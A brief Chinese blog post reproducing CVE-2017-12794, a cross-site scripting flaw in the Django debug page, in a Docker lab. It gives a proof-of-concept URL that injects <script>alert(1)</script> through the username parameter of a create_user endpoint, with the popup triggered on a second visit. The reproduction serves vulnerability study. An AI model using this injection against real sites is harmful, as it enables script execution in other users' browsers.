Django debug page XSS漏洞(CVE-2017-12794)复现
2020-09-01 17:51 rnss 阅读(705) 评论(0) 编辑 收藏 举报参考:https://paper.seebug.org/402/
使用docker搭建环境
访问:http://your-ip:8000/create_user/?username=<script>alert(1)</script>
成功创建一个用户
再次访问 http://your-ip:8000/create_user/?username=<script>alert(1)</script>
触发弹窗
